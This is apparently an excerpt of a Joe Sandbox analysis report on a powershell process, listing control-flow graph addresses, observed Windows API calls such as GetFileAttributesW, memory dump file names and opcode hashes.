                                                                                                                                                                                control_flow_graph 1467 4c0e6e4-4c0e7b6 1471 4c0e7c7-4c0e815 IdentifyCodeAuthzLevelW 1467->1471 1472 4c0e7b8-4c0e7c4 1467->1472 1473 4c0e817-4c0e81d 1471->1473 1474 4c0e81e-4c0e867 1471->1474 1472->1471 1473->1474 1478 4c0e879-4c0e880 1474->1478 1479 4c0e869-4c0e86f 1474->1479 1480 4c0e882-4c0e891 1478->1480 1481 4c0e897 1478->1481 1479->1478 1480->1481 1483 4c0e898 1481->1483 1483->1483
                                                                                                                                                                                APIs
                                                                                                                                                                                • IdentifyCodeAuthzLevelW.ADVAPI32(?,?,?,00000000), ref: 04C0E802
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2134113894.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_4c00000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AuthzCodeIdentifyLevel
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1431151113-0
                                                                                                                                                                                • Opcode ID: b8e79fc4820603e902d2a7d6b63dfe6b82556fa5b1c8e9f91eac937e61d181d5
                                                                                                                                                                                • Instruction ID: 58e16e9aa0d74558a965286ee2a2bebcf2b3ca6fa614276b97f9025fc344530d
                                                                                                                                                                                • Opcode Fuzzy Hash: b8e79fc4820603e902d2a7d6b63dfe6b82556fa5b1c8e9f91eac937e61d181d5
                                                                                                                                                                                • Instruction Fuzzy Hash: 304105B0C01269CFEB64CF59C984BD9BBB5AB48304F1085EAD40DA7250D774AE89CF60

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1484 4c0e6f0-4c0e7b6 1487 4c0e7c7-4c0e815 IdentifyCodeAuthzLevelW 1484->1487 1488 4c0e7b8-4c0e7c4 1484->1488 1489 4c0e817-4c0e81d 1487->1489 1490 4c0e81e-4c0e867 1487->1490 1488->1487 1489->1490 1494 4c0e879-4c0e880 1490->1494 1495 4c0e869-4c0e86f 1490->1495 1496 4c0e882-4c0e891 1494->1496 1497 4c0e897 1494->1497 1495->1494 1496->1497 1499 4c0e898 1497->1499 1499->1499
                                                                                                                                                                                APIs
                                                                                                                                                                                • IdentifyCodeAuthzLevelW.ADVAPI32(?,?,?,00000000), ref: 04C0E802
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2134113894.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_4c00000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AuthzCodeIdentifyLevel
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1431151113-0
                                                                                                                                                                                • Opcode ID: 158f30ac37789fa40c34377a5dce90a8b8aee6c617e08b1809b7546587bcccb0
                                                                                                                                                                                • Instruction ID: 94297bb457bd1e462795feafb3875cddbf581f9a9dffcdf93e715bb5b46d7e89
                                                                                                                                                                                • Opcode Fuzzy Hash: 158f30ac37789fa40c34377a5dce90a8b8aee6c617e08b1809b7546587bcccb0
                                                                                                                                                                                • Instruction Fuzzy Hash: 4141E4B0801269CFEB64CF99C984BDDBBB5AB48304F10C5EAD50DB7250D775AA89CF60

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1500 8de5d10-8de5d4a 1502 8de5d4c-8de5d56 1500->1502 1503 8de5d59-8de5d9b 1500->1503 1508 8de5d9d-8de5da3 1503->1508 1509 8de5da5-8de5dad 1503->1509 1510 8de5daf-8de5dbc 1508->1510 1509->1510 1512 8de5dbe 1510->1512 1513 8de5dc2-8de5dd5 1510->1513 1512->1513 1515 8de5ddb-8de5de4 1513->1515 1516 8de5e64-8de5ea6 1513->1516 1577 8de5de7 call 8de582f 1515->1577 1578 8de5de7 call 8de5840 1515->1578 1519 8de5ea9-8de5ead 1516->1519 1517 8de5ded-8de5e59 call 8de5798 1522 8de5e5f-8de5e62 1517->1522 1520 8de5eaf-8de5ed2 1519->1520 1521 8de5ed9-8de5eea 1519->1521 1520->1521 1525 8de5ffc-8de600d 1521->1525 1526 8de5ef0-8de5efa 1521->1526 1522->1519 1532 8de600f-8de6020 1525->1532 1533 8de6022-8de6043 1525->1533 1528 8de5fd6-8de5ff7 1526->1528 1529 8de5f00-8de5f1a 1526->1529 1535 8de6186-8de6190 1528->1535 1536 8de5f2e-8de5f48 1529->1536 1537 8de5f1c-8de5f29 1529->1537 1532->1533 1544 8de6048-8de6059 1532->1544 1533->1535 1540 8de6192-8de61a1 1535->1540 1541 8de61a3-8de61c4 1535->1541 1545 8de5f4a-8de5f55 1536->1545 1546 8de5f57-8de5f71 1536->1546 1542 8de5fba-8de5fd1 1537->1542 1551 8de61cb-8de61e8 1540->1551 1541->1551 1542->1535 1553 8de605b-8de607c 1544->1553 1554 8de6081-8de6090 1544->1554 1545->1542 1555 8de5f82-8de5f9c 1546->1555 1556 8de5f73-8de5f80 1546->1556 1553->1535 1560 8de6128-8de6147 1554->1560 1561 8de6096-8de60bb 1554->1561 1563 8de5f9e-8de5fab 1555->1563 1564 8de5fad-8de5fb0 1555->1564 1556->1542 1560->1535 1567 8de60bd 1561->1567 1568 8de60c5-8de6126 call 8de5900 1561->1568 1563->1542 1564->1542 1567->1568 1568->1535 1577->1517 1578->1517
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: "
                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                • Opcode ID: 7bc202d6e3181e27e770a01980184fa322262296619c5df8b5d53c0930dd8872
                                                                                                                                                                                • Instruction ID: 3e868f07490a4e6c3ce669f22ff70e927e53906d49a279897a18e7eae8b2c521
                                                                                                                                                                                • Opcode Fuzzy Hash: 7bc202d6e3181e27e770a01980184fa322262296619c5df8b5d53c0930dd8872
                                                                                                                                                                                • Instruction Fuzzy Hash: DEE10934A00209DFDB04DFA4D994BAEB7F6EF88344F2441A9E505AB291DB72AD45CF60

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1681 8c92d90-8c92df9 1682 8c92e01-8c92e2f SetThreadUILanguage 1681->1682 1683 8c92e38-8c92e52 1682->1683 1684 8c92e31-8c92e37 1682->1684 1684->1683
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetThreadUILanguage.KERNELBASE ref: 08C92E22
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172245439.0000000008C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8c90000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LanguageThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 243849632-0
                                                                                                                                                                                • Opcode ID: bcae44e20b77ddadc5ce22f8330f81e71862bcd56b3e79763cc1a1fed5af3a8e
                                                                                                                                                                                • Instruction ID: 6224fc6067c88604b1d3096f24b13598be8e8a36ac172b57ca06e547af67b7a8
                                                                                                                                                                                • Opcode Fuzzy Hash: bcae44e20b77ddadc5ce22f8330f81e71862bcd56b3e79763cc1a1fed5af3a8e
                                                                                                                                                                                • Instruction Fuzzy Hash: D01176B58043888FDB50CF99C588BEEBFF4EB18321F15849AD498A7350C378A945CFA5

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1686 4c06e80-4c06ed2 1689 4c06ed4-4c06ed7 1686->1689 1690 4c06eda-4c06f05 GetFileAttributesW 1686->1690 1689->1690 1691 4c06f07-4c06f0d 1690->1691 1692 4c06f0e-4c06f2b 1690->1692 1691->1692
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 04C06EF8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2134113894.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_4c00000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                • Opcode ID: 9f56635415284d5817f096c43b5637fe502fd9c61a75cd5d95a17749c623ec43
                                                                                                                                                                                • Instruction ID: 4650aaf5aa123d7274d765912b25571056bd45c0c8c0cc7fe37f3022df834a85
                                                                                                                                                                                • Opcode Fuzzy Hash: 9f56635415284d5817f096c43b5637fe502fd9c61a75cd5d95a17749c623ec43
                                                                                                                                                                                • Instruction Fuzzy Hash: 942136B1D0439A9BDB10CFAAD44479EFBF4EB48324F14816AD818B7240C774AA55CFA5

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1695 4c047ec-4c06ed2 1698 4c06ed4-4c06ed7 1695->1698 1699 4c06eda-4c06f05 GetFileAttributesW 1695->1699 1698->1699 1700 4c06f07-4c06f0d 1699->1700 1701 4c06f0e-4c06f2b 1699->1701 1700->1701
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 04C06EF8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2134113894.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_4c00000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                • Opcode ID: 5ba8ca3e397a8a5076b0b68debb34c4a42e207b7ab709e8d5d023818cc0ef15c
                                                                                                                                                                                • Instruction ID: e0664072754cc90c188798b333f76b719780e5fd972d3e785e70788a699018f9
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ba8ca3e397a8a5076b0b68debb34c4a42e207b7ab709e8d5d023818cc0ef15c
                                                                                                                                                                                • Instruction Fuzzy Hash: 112130B1E047599BDB10CF9AD844B9EFBF4EB48324F10812AD828B7240D374AA54CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetThreadUILanguage.KERNELBASE ref: 08C92E22
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172245439.0000000008C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8c90000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LanguageThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 243849632-0
                                                                                                                                                                                • Opcode ID: 952c3125b2238b911a8a34db2cc33a9b163f2f12ea562c3ee66f182829b1c19a
                                                                                                                                                                                • Instruction ID: 78b32890211e1e87bd624c1134dee8108ae468467ad08d8fc5ca9609b2b92b01
                                                                                                                                                                                • Opcode Fuzzy Hash: 952c3125b2238b911a8a34db2cc33a9b163f2f12ea562c3ee66f182829b1c19a
                                                                                                                                                                                • Instruction Fuzzy Hash: 60113AB18047489FDB10DF9AD4847EEBBF4EB48315F10845AD598A7310C774A944CFA4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: #
                                                                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                                                                • Opcode ID: 7ea8ad283927f5313da7b5c04412289a2ff1be5b3d3706b8acbcf41699177b01
                                                                                                                                                                                • Instruction ID: fdc80c9beb725056740f6095ef34b317f798055245ff4b899d4e6e9a29905daf
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ea8ad283927f5313da7b5c04412289a2ff1be5b3d3706b8acbcf41699177b01
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E911E34A00219CFDF24EF65C984BADB7B6AF48343F1486ADE859AB254DB3499C1CF50
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: }/,c
                                                                                                                                                                                • API String ID: 0-963269455
                                                                                                                                                                                • Opcode ID: c841230a7e0179cae00401ed5fe553bb661956972b3ca2906fb854f449c18052
                                                                                                                                                                                • Instruction ID: fa4832398f9f1f97845a49695caa6e5ba282b390535637790e100859d7234efc
                                                                                                                                                                                • Opcode Fuzzy Hash: c841230a7e0179cae00401ed5fe553bb661956972b3ca2906fb854f449c18052
                                                                                                                                                                                • Instruction Fuzzy Hash: 7421F2B5900349AFCF10CF9AD884BDEBBF4FF48310F10852AE919A7250D374A954CBA4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2167324382.0000000008880000.00000040.00000800.00020000.00000000.sdmp, Offset: 08880000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8880000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cdab9aaf1a1e1e3a95a775c6f5b8349233cb44b220c1b6ba7c45b9422b829042
                                                                                                                                                                                • Instruction ID: 47c722c68727f4a712740e1075033fdbcdcaf728d9d4760d8b2e9be50912cacf
                                                                                                                                                                                • Opcode Fuzzy Hash: cdab9aaf1a1e1e3a95a775c6f5b8349233cb44b220c1b6ba7c45b9422b829042
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F524639B04348DFCB25AB68D80876ABBE2AFC5212F1480AED545DB652DF35DC43C7A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0cec97cb503cec87a0cd61404c79d2a73b120c18dc1b0028d4a4fdc7213f4b1c
                                                                                                                                                                                • Instruction ID: 8c0d9bd52ed7126ffddbb95662b068dd3045bf73445f4d7e4e002d55bcf16698
                                                                                                                                                                                • Opcode Fuzzy Hash: 0cec97cb503cec87a0cd61404c79d2a73b120c18dc1b0028d4a4fdc7213f4b1c
                                                                                                                                                                                • Instruction Fuzzy Hash: B8327C34A002498FDB14DF94C444BAEB7B2FF88302F25C569E115AF2A9CB74DD85CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1bfe62887f1a2d1ba6dc23a02138a206fddd91928c505a1361efc3d1d8c78866
                                                                                                                                                                                • Instruction ID: b563f21f33bcbfa43b7ca691f75da8b43a7503bacf0d29ea1eb4d7d4b2790c25
                                                                                                                                                                                • Opcode Fuzzy Hash: 1bfe62887f1a2d1ba6dc23a02138a206fddd91928c505a1361efc3d1d8c78866
                                                                                                                                                                                • Instruction Fuzzy Hash: 94123734A00204CFDB54EFA8D584A9DB7F2FF88351F1586A9E905AB361CB74ED46CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2dc4522bb77f6c07427583aa637c1de74c06e6372bd71beb7b48f9b463fb7127
                                                                                                                                                                                • Instruction ID: 7bfa224f9c41fa3452780344c0fca7316cc229dbd1e7163c3f5712562e5633fd
                                                                                                                                                                                • Opcode Fuzzy Hash: 2dc4522bb77f6c07427583aa637c1de74c06e6372bd71beb7b48f9b463fb7127
                                                                                                                                                                                • Instruction Fuzzy Hash: 06123934A00228DFDB14DFA8D464AAEBBF2FF88311F118569D406AB350DB75ED45CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c446984664e743ba7f2afc9f475971655531635d8c4490f3c7eac080d5263a57
                                                                                                                                                                                • Instruction ID: 73f7ccb17fb1bc4bf210a9a662d015886aa27617be8e9a45a423f7fc7a71c0b9
                                                                                                                                                                                • Opcode Fuzzy Hash: c446984664e743ba7f2afc9f475971655531635d8c4490f3c7eac080d5263a57
                                                                                                                                                                                • Instruction Fuzzy Hash: 4DE19E34B00204DFDB149F68E854BAEBBE6EF88351F1980A9D916DB391DB75CD41CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 07afae6bcc375542630330af9401b85be90c714937f35f97a7d97e4bfa27d652
                                                                                                                                                                                • Instruction ID: bee6a6f691bb65e8f7d79a9f3dcd1c0360e7688980139c7756702c9946433640
                                                                                                                                                                                • Opcode Fuzzy Hash: 07afae6bcc375542630330af9401b85be90c714937f35f97a7d97e4bfa27d652
                                                                                                                                                                                • Instruction Fuzzy Hash: 3602C734A00219CFDB14DFA4D894A9DBBB6FF89302F259169D81AAB361DB35EC41CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7b7bfa529da3c264dac0931d9a8fb9a555fe50e9b7573c302b3d7f1f2182402e
                                                                                                                                                                                • Instruction ID: 1f65229559098948a78f7631f3e1e683a12c812428576460ff6586ff3c28f501
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b7bfa529da3c264dac0931d9a8fb9a555fe50e9b7573c302b3d7f1f2182402e
                                                                                                                                                                                • Instruction Fuzzy Hash: 6EC1F331E007099FDB11DF64C850BAEBBB2EF85311F1486A9D915AB390DB31AD46CBA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4b138bbbfdf0170ffa452cac40132b47a3b648c015483fca0e45ebc410b774ea
                                                                                                                                                                                • Instruction ID: 5ee1d4395d9585b080fc3f8cd77fe70815e71d5fe8112cf2aba54f73bac7ad66
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b138bbbfdf0170ffa452cac40132b47a3b648c015483fca0e45ebc410b774ea
                                                                                                                                                                                • Instruction Fuzzy Hash: BBD13934A013049FDB15DFA4D494BAEBBB3EF84341F24852CE506AB3A1CB75E945CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fc8c568bc7933f1eba6d2da1afe2effa81525bca975235726e20c8511194e9e7
                                                                                                                                                                                • Instruction ID: ff4db1f740fcf665491461885b55f6e5aad2e80019ddcfeae939d92e3f4529c2
                                                                                                                                                                                • Opcode Fuzzy Hash: fc8c568bc7933f1eba6d2da1afe2effa81525bca975235726e20c8511194e9e7
                                                                                                                                                                                • Instruction Fuzzy Hash: D8D16F74A01345DFDB04DF68D590A5DBBB2FF88365F1686A9E4059B361DB30EC82CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b716d3b645bdb35136c4586afe861ec41db4e4ceed9a76ec8e745eeef44bacd3
                                                                                                                                                                                • Instruction ID: b73349d55f9b576e8d6f95922ce7ae179d7d90c93847d5c963b2e67066b852ff
                                                                                                                                                                                • Opcode Fuzzy Hash: b716d3b645bdb35136c4586afe861ec41db4e4ceed9a76ec8e745eeef44bacd3
                                                                                                                                                                                • Instruction Fuzzy Hash: 13C19D35B00218DFCB14DBA8E844AAEB7B2FF88351F14862DE5469B355DB35EC41CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 94b41ccec68240a420144185eaa649723a9fcaf89b9536b99d342be36c41b461
                                                                                                                                                                                • Instruction ID: 5c1184ac2a4ee56cf83a38f29897b2d3848b13bd05d637dceeea9943bf92fdd1
                                                                                                                                                                                • Opcode Fuzzy Hash: 94b41ccec68240a420144185eaa649723a9fcaf89b9536b99d342be36c41b461
                                                                                                                                                                                • Instruction Fuzzy Hash: 69D1FC74A002158FCB15DF65D58499D7BF2BF9C361F1552A8E805AB3A6DB30EC81CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d307a63dc61993acb30cd908ff03ad4ab5fa0a330351697162bc609e98b08478
                                                                                                                                                                                • Instruction ID: 71c8d3604c35bfb0bc3575e9992badf9c4bcebce06e022ac726fe4bb4f307a5a
                                                                                                                                                                                • Opcode Fuzzy Hash: d307a63dc61993acb30cd908ff03ad4ab5fa0a330351697162bc609e98b08478
                                                                                                                                                                                • Instruction Fuzzy Hash: D6C16D74B002089FDB14EFA4C894BAEBBB6EF88311F10416DE9069B391DB75EC42CB54
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0c1c088e4487695649e91eaec9bcf02d0a65eacfb6d6339b0f6d054a30dba711
                                                                                                                                                                                • Instruction ID: 365e00991834f76ee6e7a8aad1406ccdbeb84e17b93df5e9baa2371321b664b7
                                                                                                                                                                                • Opcode Fuzzy Hash: 0c1c088e4487695649e91eaec9bcf02d0a65eacfb6d6339b0f6d054a30dba711
                                                                                                                                                                                • Instruction Fuzzy Hash: 68D11874A01219CFDB24CF94C688B99BBB2FF48316F5191A8D406AF366D778ED49CB40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d18ad5c8b0bec58343469ae20427504621914368c92b0ffa66d7fdcb381e9049
                                                                                                                                                                                • Instruction ID: e3a0b35f0898eea2320365d1ffe97cc2a77571d81ea96a98e32ff50ec65ccf77
                                                                                                                                                                                • Opcode Fuzzy Hash: d18ad5c8b0bec58343469ae20427504621914368c92b0ffa66d7fdcb381e9049
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BC167706007469FCB20DF69E980AAEB7F2FF88301B10862CD4469B755DB70E946CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174381658.0000000008DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dc0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 947f05ef8f99f90e9e14c538e61cc2930336eb4629a836bb729e79ff01d9aba6
                                                                                                                                                                                • Instruction ID: 547f497479035bee98752749785900570bd8820588f0f800306859dac608aaa2
                                                                                                                                                                                • Opcode Fuzzy Hash: 947f05ef8f99f90e9e14c538e61cc2930336eb4629a836bb729e79ff01d9aba6
                                                                                                                                                                                • Instruction Fuzzy Hash: 8CA1EE34B003059FEB15EB78D854BADBBB2EF89341F10856DDA02AB390DB75D881DB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
